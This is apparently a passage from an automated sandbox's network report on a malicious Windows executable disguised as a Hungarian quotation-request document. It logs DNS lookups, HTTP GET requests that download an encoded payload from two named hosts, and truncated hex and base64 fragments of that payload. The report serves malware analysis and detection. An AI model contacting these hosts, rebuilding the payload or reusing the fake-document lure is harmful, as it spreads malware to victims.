                                                                                                                                                Nov 11, 2024 19:20:40.227617979 CET53579271.1.1.1192.168.2.4
                                                                                                                                                Nov 11, 2024 19:21:01.613037109 CET5246053192.168.2.41.1.1.1
                                                                                                                                                Nov 11, 2024 19:21:01.637171030 CET53524601.1.1.1192.168.2.4

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                Nov 11, 2024 19:16:46.842540026 CET192.168.2.41.1.1.10x64e7Standard query (0)voievodulgelu.roA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:16:48.402046919 CET192.168.2.41.1.1.10xdcccStandard query (0)mbsngradnja.comA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:16:49.408278942 CET192.168.2.41.1.1.10xdcccStandard query (0)mbsngradnja.comA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:17:32.100327015 CET192.168.2.41.1.1.10xca6bStandard query (0)www.egos.designA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:17:51.847595930 CET192.168.2.41.1.1.10x9461Standard query (0)www.xc31.topA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:18:12.175898075 CET192.168.2.41.1.1.10x2af9Standard query (0)www.ursing-caregiver-jobs-za-3.bondA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:18:33.207046986 CET192.168.2.41.1.1.10xfa26Standard query (0)www.trl-migrate.onlineA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:18:54.100953102 CET192.168.2.41.1.1.10x510fStandard query (0)www.r-outsourcing-69869.bondA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:19:15.288335085 CET192.168.2.41.1.1.10xa7b4Standard query (0)www.apaescortatings.xyzA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:19:36.452917099 CET192.168.2.41.1.1.10x3dcStandard query (0)www.ynthia-mcc-lin-tick.linkA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:19:57.148802996 CET192.168.2.41.1.1.10x834bStandard query (0)www.atingdilse.siteA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:20:18.804894924 CET192.168.2.41.1.1.10x6a5bStandard query (0)www.joops.musicA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:20:40.208863974 CET192.168.2.41.1.1.10xfb4cStandard query (0)www.upta.bioA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:21:01.613037109 CET192.168.2.41.1.1.10x4756Standard query (0)www.9838.xyzA (IP address)IN (0x0001)false

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                Nov 11, 2024 19:16:46.865551949 CET1.1.1.1192.168.2.40x64e7No error (0)voievodulgelu.ro92.114.2.230A (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:16:50.127655983 CET1.1.1.1192.168.2.40xdcccNo error (0)mbsngradnja.com77.105.36.123A (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:16:50.128180027 CET1.1.1.1192.168.2.40xdcccNo error (0)mbsngradnja.com77.105.36.123A (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:17:32.110287905 CET1.1.1.1192.168.2.40xca6bName error (3)www.egos.designnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:17:52.182626963 CET1.1.1.1192.168.2.40x9461Server failure (2)www.xc31.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:18:12.199220896 CET1.1.1.1192.168.2.40x2af9Name error (3)www.ursing-caregiver-jobs-za-3.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:18:33.230485916 CET1.1.1.1192.168.2.40xfa26Name error (3)www.trl-migrate.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:18:54.124774933 CET1.1.1.1192.168.2.40x510fName error (3)www.r-outsourcing-69869.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:19:15.312720060 CET1.1.1.1192.168.2.40xa7b4Name error (3)www.apaescortatings.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:19:36.462101936 CET1.1.1.1192.168.2.40x3dcName error (3)www.ynthia-mcc-lin-tick.linknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:19:57.171341896 CET1.1.1.1192.168.2.40x834bName error (3)www.atingdilse.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:20:18.824526072 CET1.1.1.1192.168.2.40x6a5bName error (3)www.joops.musicnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:20:40.227617979 CET1.1.1.1192.168.2.40xfb4cName error (3)www.upta.biononenoneA (IP address)IN (0x0001)false
                                                                                                                                                Nov 11, 2024 19:21:01.637171030 CET1.1.1.1192.168.2.40x4756Name error (3)www.9838.xyznonenoneA (IP address)IN (0x0001)false

                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                • voievodulgelu.ro
                                                                                                                                                • mbsngradnja.com

                                                                                                                                                HTTP Packets

                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                0192.168.2.44973192.114.2.230806928C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 11, 2024 19:16:46.910592079 CET165OUTGET /244_Rgzwnbqrkpn HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                Host: voievodulgelu.ro
                                                                                                                                                Nov 11, 2024 19:16:47.585014105 CET1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 11 Nov 2024 18:16:47 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade, Keep-Alive
                                                                                                                                                Last-Modified: Wed, 06 Nov 2024 09:42:28 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 659248
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Keep-Alive: timeout=3, max=100
                                                                                                                                                Data Raw: 73 62 6d 77 5a 43 36 79 76 46 59 61 47 78 30 67 4b 53 45 6f 4b 42 34 78 4c 79 4d 69 4c 69 67 76 4b 42 77 6a 4b 52 73 6a 48 69 77 6a 4b 79 6f 68 48 68 34 74 48 78 73 63 4a 43 49 73 48 68 34 67 4d 54 45 6b 4a 43 6b 6a 4a 68 6b 6f 4d 52 77 68 4a 78 6b 74 49 52 73 76 49 53 45 62 4b 79 55 64 4d 43 6f 69 4d 42 6b 77 4d 52 73 76 49 69 6f 5a 48 52 30 66 4c 69 67 6c 4a 53 34 6a 4b 69 55 5a 48 54 45 77 49 53 38 6e 47 53 77 65 4b 53 45 66 4c 79 77 6d 4a 52 73 6e 47 79 55 6f 49 52 6f 72 4b 43 4b 78 75 62 42 6b 4c 72 4b 38 56 67 6f 66 4d 69 38 6d 47 69 6b 71 49 79 67 6d 73 62 6d 77 5a 43 36 79 76 46 62 65 33 64 66 6b 79 2b 50 4d 7a 4e 72 54 79 65 58 6d 79 73 7a 4a 7a 4e 6a 6c 79 39 33 6c 32 73 6a 6c 7a 63 37 6a 32 74 72 48 32 64 33 59 34 4f 62 49 32 74 72 6b 30 39 50 67 34 4d 76 6c 34 74 76 4d 30 39 6a 6a 34 64 76 48 34 39 33 4a 34 2b 50 64 7a 64 2f 58 31 4d 37 6d 31 4e 76 55 30 39 33 4a 35 73 37 62 31 39 66 5a 79 73 7a 66 33 38 72 6c 7a 74 2f 62 31 39 50 55 34 38 6e 68 32 38 6a 61 79 2b 50 5a 79 63 6a 69 33 39 [TRUNCATED]
                                                                                                                                                Data Ascii: sbmwZC6yvFYaGx0gKSEoKB4xLyMiLigvKBwjKRsjHiwjKyohHh4tHxscJCIsHh4gMTEkJCkjJhkoMRwhJxktIRsvISEbKyUdMCoiMBkwMRsvIioZHR0fLiglJS4jKiUZHTEwIS8nGSweKSEfLywmJRsnGyUoIRorKCKxubBkLrK8VgofMi8mGikqIygmsbmwZC6yvFbe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+P
                                                                                                                                                Nov 11, 2024 19:16:47.585113049 CET1236INData Raw: 4d 7a 4e 72 54 79 65 58 6d 79 73 7a 4a 7a 4e 6a 6c 79 39 33 6c 32 73 6a 6c 7a 63 37 6a 32 74 72 48 32 64 33 59 34 4f 62 49 32 74 72 6b 30 39 50 67 34 4d 76 6c 34 74 76 4d 30 39 6a 6a 34 64 76 48 34 39 33 4a 34 2b 50 64 7a 64 2f 58 31 4d 37 6d 31
                                                                                                                                                Data Ascii: MzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszfw5DCWPm+bFpEFDAqel7NSvmmjTa1pJduXJXkjZsqHBqlIwfkDEK498PIy/ijWpQwNA/l4mWIwC5bsA5H/t7xKoTT920Cvrd2NR7+dfZ+pQEllbH+mJu5fkrgIhXN/qvpCnYxOL1ZsjqTaK
                                                                                                                                                Nov 11, 2024 19:16:47.585127115 CET1236INData Raw: 6e 68 6a 38 76 4a 71 51 4b 4f 6c 42 63 51 66 42 72 6a 6d 49 74 63 69 52 45 45 45 62 50 2f 6a 77 47 6e 63 37 41 41 56 47 2f 33 76 65 48 4d 42 73 4b 42 4d 50 71 43 6c 50 57 45 37 6c 64 76 59 66 46 6e 59 33 6e 7a 39 63 69 30 4d 69 32 52 63 69 2f 2b
                                                                                                                                                Data Ascii: nhj8vJqQKOlBcQfBrjmItciREEEbP/jwGnc7AAVG/3veHMBsKBMPqClPWE7ldvYfFnY3nz9ci0Mi2Rci/+SlfIzqTN86dlQkAbui9EUmg37cf3/kzoNy4pYiGDpE2PCrcniGnZ19XMILxULlsV2RWwnAsK9YGlYjYP/bPgiKyfBiTweW+mBwF8kTIEkx9iGDGWAif1qVvxAcKyoTVY0UkDCyCbrR7qbYZMIANzCZZ21MAekwOHU
                                                                                                                                                Nov 11, 2024 19:16:47.585717916 CET1236INData Raw: 6f 68 50 65 38 77 48 68 6f 79 41 6f 6d 45 31 59 37 59 33 2b 65 31 4c 37 38 49 4d 54 4c 36 75 46 39 62 51 48 2f 73 46 4d 77 6a 38 31 37 2f 6a 77 6e 61 30 50 48 39 48 6b 59 30 34 52 59 72 4b 50 64 46 43 44 33 6c 64 5a 6d 41 37 6f 6c 75 2b 30 55 33
                                                                                                                                                Data Ascii: ohPe8wHhoyAomE1Y7Y3+e1L78IMTL6uF9bQH/sFMwj817/jwna0PH9HkY04RYrKPdFCD3ldZmA7olu+0U3JB9oxCcOG5gUOPTAavCr+CprRWM8G+nHuQIyFAIR5T5BSRrkQQfdxgA621qzbqEy2aOD7wJjbxK6nTJAMfQ8qEHTeKbLAoO78qMJifvzYd6xhhuOzv8fGTGIKRxDUHXf6AC95/RYvCMeawUMh58js/ISQa/YczWUd
                                                                                                                                                Nov 11, 2024 19:16:47.585730076 CET1236INData Raw: 4f 77 79 6b 5a 2f 64 7a 49 4c 52 63 32 38 78 58 6e 62 58 59 6b 4d 69 33 76 65 48 4d 4b 73 42 75 58 56 7a 36 5a 4d 33 66 43 35 4b 44 6d 36 49 73 54 4e 6b 6a 52 65 79 58 2f 77 64 34 6b 58 36 52 49 31 79 69 32 55 70 50 63 6f 55 35 75 7a 76 70 58 77
                                                                                                                                                Data Ascii: OwykZ/dzILRc28xXnbXYkMi3veHMKsBuXVz6ZM3fC5KDm6IsTNkjReyX/wd4kX6RI1yi2UpPcoU5uzvpXwoM8Xlv+9vHoJaDb+RSNYdUlJgqrMYBDtNzlCU9ond1KIEMGZDoe+L2/ZtHJFVE4Z2Z5q9E5mWQGt7Rv7thNfFBRRdHqmb863Yy24rbIkxaRO3m6tePfThdgftQlBx91ORmRjP8D3qgM0yTkAVO5tU3cJANaMAREKA
                                                                                                                                                Nov 11, 2024 19:16:47.586484909 CET1060INData Raw: 55 58 65 4e 48 4d 61 4d 51 65 66 6d 46 6a 30 57 37 63 6b 47 56 58 61 56 54 61 67 54 62 61 4e 58 70 41 71 36 49 4e 63 67 64 56 6f 74 56 78 42 46 44 4d 4a 44 38 4c 75 4a 31 75 76 4a 6f 6f 4d 39 72 76 76 78 33 66 31 45 59 79 76 46 7a 4d 47 77 71 4b
                                                                                                                                                Data Ascii: UXeNHMaMQefmFj0W7ckGVXaVTagTbaNXpAq6INcgdVotVxBFDMJD8LuJ1uvJooM9rvvx3f1EYyvFzMGwqKHqLZVY9ei1gpwXF+44wJi7RAcWs2TH2v4BARa4q6/GgNGOrKo1GAQUq/bx7qW4ZFN8YZto7/Pjd5h/PEiDdew3sDy1I35fzW3tSXmc+PG1asrSTKqE+szlF5eaED8IFFeTE+oPmrkqf3X6ZYCU35hlk2TcxuRMeKm
                                                                                                                                                Nov 11, 2024 19:16:47.586498022 CET1236INData Raw: 68 68 70 79 53 2b 71 45 6b 6f 2f 62 68 31 38 6f 66 4a 4f 79 54 30 64 35 39 5a 2b 70 71 4b 54 50 71 56 77 42 37 55 61 78 4b 47 75 57 42 76 69 46 50 56 5a 33 6b 32 76 62 35 6d 43 32 4b 63 78 63 68 79 39 55 56 6d 47 41 63 39 73 72 65 35 76 71 77 32
                                                                                                                                                Data Ascii: hhpyS+qEko/bh18ofJOyT0d59Z+pqKTPqVwB7UaxKGuWBviFPVZ3k2vb5mC2Kcxchy9UVmGAc9sre5vqw22y6DjoKJ4Pfziowg35cbWEj2yz5bG0j6Gy78GkiKrxZtW83cjcAf6/G9l1k8hN4ndClpCxwQ3p4+iuZRhy6x69AQ11IWaH+BNKPIbq5dl7GLBD6E55XRRIOgBkKcXQhFEfDq9xsH+y6k6qiGvH/Dt8If4BiZE9sUj
                                                                                                                                                Nov 11, 2024 19:16:47.587115049 CET1236INData Raw: 6b 61 4f 4f 55 76 63 55 57 45 53 7a 56 2f 79 38 5a 48 59 6f 35 42 55 76 79 6b 4c 64 62 73 61 50 66 69 33 48 49 54 34 6c 4a 54 43 6c 65 6c 6a 57 48 54 49 42 44 34 58 63 6d 48 59 4c 6d 4e 33 49 71 66 53 6b 78 62 45 55 54 42 4a 4d 57 71 70 4c 56 70
                                                                                                                                                Data Ascii: kaOOUvcUWESzV/y8ZHYo5BUvykLdbsaPfi3HIT4lJTCleljWHTIBD4XcmHYLmN3IqfSkxbEUTBJMWqpLVpChTN0tXiKg4cZP/ksUh3CUTdMqascTB/Y+4nQl1rV38MJ8ClTnf0iv+EW9awZtdXfEDeoFAJsXcdnGfeW51uYG/hM1pnEXWQwnJpLiXWVPflInt2qzeiZQZuANnb+MRn4JHpW9TTFAGrQLJ7RD097YZu6LAKS/a/R
                                                                                                                                                Nov 11, 2024 19:16:47.587126970 CET1236INData Raw: 32 38 6c 72 4a 6b 56 78 2f 78 4f 64 6a 74 71 68 30 56 2b 45 56 77 36 72 30 34 33 75 78 58 50 48 4b 4a 33 35 78 57 70 31 65 43 2f 6a 66 32 62 30 51 43 61 6e 4d 68 34 31 75 41 7a 4f 48 69 68 66 78 47 57 47 43 34 65 78 68 69 68 73 45 41 59 63 4a 58
                                                                                                                                                Data Ascii: 28lrJkVx/xOdjtqh0V+EVw6r043uxXPHKJ35xWp1eC/jf2b0QCanMh41uAzOHihfxGWGC4exhihsEAYcJX2ummaiv0xYZDUW/6Ip3Orm/OeCRoEjx/JwMjueLvWoPvZ6YBkvemkC4DA7p6nIAtnBuZCW/guucRf9pNF1cA8VjLYz7WiEInM4JuWewWR6+TpgPnEgicZcSe8pKePJy46rOJGM1l9QhXuVYCzOeDqypWjkpEcrRDP
                                                                                                                                                Nov 11, 2024 19:16:47.587742090 CET1236INData Raw: 69 48 69 4d 4c 6c 4b 57 65 31 6e 4b 78 34 4e 6c 64 46 39 43 54 33 76 67 39 39 43 73 6a 49 71 72 59 4b 72 62 48 48 4f 4a 42 6c 76 70 58 71 4a 54 53 48 4c 32 41 73 50 31 56 2f 52 57 71 75 37 36 36 2b 72 74 4d 48 72 66 48 55 2b 57 55 78 31 2f 53 64
                                                                                                                                                Data Ascii: iHiMLlKWe1nKx4NldF9CT3vg99CsjIqrYKrbHHOJBlvpXqJTSHL2AsP1V/RWqu766+rtMHrfHU+WUx1/Sd6npkOgy+7Efhgp+KnOqt43r4kOk+PiWCvdsXhHUf5hbbBxY/sQR6sEd7LRQv7euQBDfzsaKnksGOTUWoEglqiXzAzrdeAY0egbibPYpMc9TNGg5h7Z92rvYpRaotzn9G+1F820ZgFyB2MAKBlq6uvGO2hxskgF4Sm
                                                                                                                                                Nov 11, 2024 19:16:47.590157986 CET1236INData Raw: 49 34 6a 69 47 30 4e 33 56 50 35 70 42 63 57 70 6c 6f 4f 33 50 45 59 79 39 39 6c 77 68 50 4e 54 44 6d 6f 47 35 6f 34 35 78 4b 53 58 74 71 2f 6e 4e 75 47 57 2b 57 35 75 74 54 4e 41 68 47 50 49 77 34 2f 4c 66 4c 56 7a 6b 76 75 65 52 69 38 64 30 57
                                                                                                                                                Data Ascii: I4jiG0N3VP5pBcWploO3PEYy99lwhPNTDmoG5o45xKSXtq/nNuGW+W5utTNAhGPIw4/LfLVzkvueRi8d0WC45oYUplp4BjGubue37AShZOy0ilNnzNs7W708j1/XoBHBPeLnAHOrR1Pk3r4QrTCuVJvfJ50AuSwzzZEbeotJ6J1XWmpdZ17o4ncV+Gs/0sNL1uKcaihIF++O0/cX6f8K1cdGySaFs0W+Lj8ObFmqP6pce/+ouZT


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.44973377.105.36.123806928C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                Nov 11, 2024 19:16:50.162796974 CET164OUTGET /244_Rgzwnbqrkpn HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                                Host: mbsngradnja.com
                                                                                                                                                Nov 11, 2024 19:16:50.806740046 CET1236INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 11 Nov 2024 18:16:50 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade, Keep-Alive
                                                                                                                                                Last-Modified: Mon, 11 Nov 2024 00:56:48 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 659248
                                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                                Data Raw: 73 62 6d 77 5a 43 36 79 76 46 59 61 47 78 30 67 4b 53 45 6f 4b 42 34 78 4c 79 4d 69 4c 69 67 76 4b 42 77 6a 4b 52 73 6a 48 69 77 6a 4b 79 6f 68 48 68 34 74 48 78 73 63 4a 43 49 73 48 68 34 67 4d 54 45 6b 4a 43 6b 6a 4a 68 6b 6f 4d 52 77 68 4a 78 6b 74 49 52 73 76 49 53 45 62 4b 79 55 64 4d 43 6f 69 4d 42 6b 77 4d 52 73 76 49 69 6f 5a 48 52 30 66 4c 69 67 6c 4a 53 34 6a 4b 69 55 5a 48 54 45 77 49 53 38 6e 47 53 77 65 4b 53 45 66 4c 79 77 6d 4a 52 73 6e 47 79 55 6f 49 52 6f 72 4b 43 4b 78 75 62 42 6b 4c 72 4b 38 56 67 6f 66 4d 69 38 6d 47 69 6b 71 49 79 67 6d 73 62 6d 77 5a 43 36 79 76 46 62 65 33 64 66 6b 79 2b 50 4d 7a 4e 72 54 79 65 58 6d 79 73 7a 4a 7a 4e 6a 6c 79 39 33 6c 32 73 6a 6c 7a 63 37 6a 32 74 72 48 32 64 33 59 34 4f 62 49 32 74 72 6b 30 39 50 67 34 4d 76 6c 34 74 76 4d 30 39 6a 6a 34 64 76 48 34 39 33 4a 34 2b 50 64 7a 64 2f 58 31 4d 37 6d 31 4e 76 55 30 39 33 4a 35 73 37 62 31 39 66 5a 79 73 7a 66 33 38 72 6c 7a 74 2f 62 31 39 50 55 34 38 6e 68 32 38 6a 61 79 2b 50 5a 79 63 6a 69 33 39 [TRUNCATED]
                                                                                                                                                Data Ascii: sbmwZC6yvFYaGx0gKSEoKB4xLyMiLigvKBwjKRsjHiwjKyohHh4tHxscJCIsHh4gMTEkJCkjJhkoMRwhJxktIRsvISEbKyUdMCoiMBkwMRsvIioZHR0fLiglJS4jKiUZHTEwIS8nGSweKSEfLywmJRsnGyUoIRorKCKxubBkLrK8VgofMi8mGikqIygmsbmwZC6yvFbe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2sjlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszf38rlzt/b19PU48nh28jay+PZycji393h3d/M497NzObe3dfky+PMzNrTyeXmyszJzNjly93l2s
                                                                                                                                                Nov 11, 2024 19:16:50.806777954 CET212INData Raw: 6a 6c 7a 63 37 6a 32 74 72 48 32 64 33 59 34 4f 62 49 32 74 72 6b 30 39 50 67 34 4d 76 6c 34 74 76 4d 30 39 6a 6a 34 64 76 48 34 39 33 4a 34 2b 50 64 7a 64 2f 58 31 4d 37 6d 31 4e 76 55 30 39 33 4a 35 73 37 62 31 39 66 5a 79 73 7a 66 77 35 44 43
                                                                                                                                                Data Ascii: jlzc7j2trH2d3Y4ObI2trk09Pg4Mvl4tvM09jj4dvH493J4+Pdzd/X1M7m1NvU093J5s7b19fZyszfw5DCWPm+bFpEFDAqel7NSvmmjTa1pJduXJXkjZsqHBqlIwfkDEK498PIy/ijWpQwNA/l4mWIwC5bsA5H/t7xKoTT920Cvrd2NR7+dfZ+pQEllbH+mJu5fkrgIhXN/qvpCnYxOL
                                                                                                                                                Nov 11, 2024 19:16:50.806790113 CET1236INData Raw: 31 5a 73 6a 71 54 61 4b 50 4f 48 72 32 7a 6f 37 58 4b 73 32 46 6c 39 44 38 42 63 37 61 30 71 71 72 2b 44 35 53 37 62 32 71 6c 75 36 73 5a 5a 6c 61 6a 63 47 7a 6a 54 38 6c 78 44 39 2b 31 49 54 68 63 54 4f 75 4d 63 62 52 6a 36 66 43 37 6f 76 71 6d
                                                                                                                                                Data Ascii: 1ZsjqTaKPOHr2zo7XKs2Fl9D8Bc7a0qqr+D5S7b2qlu6sZZlajcGzjT8lxD9+1IThcTOuMcbRj6fC7ovqm9XaoyMFvo7FuXx035l5yIIB85fnojBKaS4NOcqUfQGDFz1He2DwseBDNzhD+81E4WQLQ05gXkpj4IRrrNJgMxoS/tq7n2121T3QZt1SJwA9kekyF5A2Pc2gkHwu1Ftq4ig8uIUiNNBejPoof5h2CBgn8BKM9RaBPJ
                                                                                                                                                Nov 11, 2024 19:16:50.806826115 CET1236INData Raw: 4d 41 65 6b 77 4f 48 55 49 55 68 4f 61 50 65 4d 51 6c 49 4b 6c 2b 35 48 6c 75 78 34 45 4d 64 34 2f 51 6b 69 34 72 32 66 52 75 6f 74 4c 41 4c 48 69 48 65 4c 61 64 50 48 77 67 36 32 62 58 62 41 49 6d 2b 59 69 61 31 66 68 73 45 43 69 56 71 63 6b 38
                                                                                                                                                Data Ascii: MAekwOHUIUhOaPeMQlIKl+5Hlux4EMd4/Qki4r2fRuotLALHiHeLadPHwg62bXbAIm+Yia1fhsECiVqck8WA6pzFT0xa+sos0u9S7XiWbmgqN5lelZN14qB5RWMzCFWp5vDyDgn2HNWnBlLZyaGVyp4ZEt+JlDduvOSoqRb/Fj8UT678ZUWhtgAwDaNfVa4P53jDKJ8B9R4bAKckSfXIJBM24BbzJn+FFpnhvTV/5dq8V8mXX6i
                                                                                                                                                Nov 11, 2024 19:16:50.806838036 CET1236INData Raw: 61 2f 59 63 7a 57 55 64 6b 69 6d 4f 4b 77 42 52 73 70 72 53 4e 71 4c 2f 63 73 75 69 5a 58 4a 6b 52 36 5a 53 47 58 6d 36 63 6a 73 6e 62 2f 53 47 61 43 53 4b 70 53 36 78 42 73 4d 77 6d 6b 41 4d 52 2b 36 4f 6c 67 47 42 52 42 4e 61 52 66 69 77 6f 32
                                                                                                                                                Data Ascii: a/YczWUdkimOKwBRsprSNqL/csuiZXJkR6ZSGXm6cjsnb/SGaCSKpS6xBsMwmkAMR+6OlgGBRBNaRfiwo2/szhuVjDeaadVKZwJdcex4rH4gWos24ha4A4sOFivi44Q8JQRc+QAMD9+VFNOqdIwFqS7sDuEwy1gKcSWwofCGJXyR7NW7vaOkec3bGK0GPvK70vy3xC9LgSWC+LFXTEf/gdJrvtrHmX6u33GgioKRXEU8IIXTMOx
                                                                                                                                                Nov 11, 2024 19:16:50.806849957 CET636INData Raw: 4e 61 4d 41 52 45 4b 41 50 61 31 57 46 59 57 75 7a 6a 56 45 5a 4d 75 4a 5a 68 45 6d 77 77 68 6f 36 37 57 4c 71 4f 59 4c 47 49 75 5a 65 76 4f 62 76 35 49 73 68 61 6e 35 79 4e 36 43 58 44 54 77 57 61 67 2b 48 78 6f 48 47 30 71 75 79 4a 46 46 63 65
                                                                                                                                                Data Ascii: NaMAREKAPa1WFYWuzjVEZMuJZhEmwwho67WLqOYLGIuZevObv5Ishan5yN6CXDTwWag+HxoHG0quyJFFceBryaXpVVkc/tLDHiV7grVqP3wb8zTlcDFcM9Saa23v/hu27P+2CgpyhU6iT0oseEL009rFVJsBmBpz87Q5ItYV97OpYbjWrZctS7Jh0H0KyCLD+INXaK0xCE/5qqj129cbswcA4GtKD+L+0174wzZQjavoPJfIs2H
                                                                                                                                                Nov 11, 2024 19:16:50.807060957 CET1236INData Raw: 61 46 73 42 76 6a 64 70 42 53 30 4c 5a 34 77 71 74 35 64 2b 39 66 47 36 32 39 62 4f 4b 2f 51 49 36 47 72 63 45 6a 66 6c 32 42 71 2b 77 69 4c 38 51 31 43 78 37 2b 76 74 50 4d 2f 61 4d 6f 6b 67 35 47 73 42 4a 50 57 4b 69 4b 44 73 56 43 62 4c 6b 64
                                                                                                                                                Data Ascii: aFsBvjdpBS0LZ4wqt5d+9fG629bOK/QI6GrcEjfl2Bq+wiL8Q1Cx7+vtPM/aMokg5GsBJPWKiKDsVCbLkdisfPXx31bkpoU6GlhsKHrgAfyfyEZltDyunTI9zdDN9VvVBNlM/BxIFdbh+C1/tZNFkWog1pH06jKvhmKUzyGeaU8opCzuHKhYcPzarY21ivCQ4RUvrmJpOsd/QGIew6WsqKpF5zWyypTa7A3bav2dkIgTmjhv87o
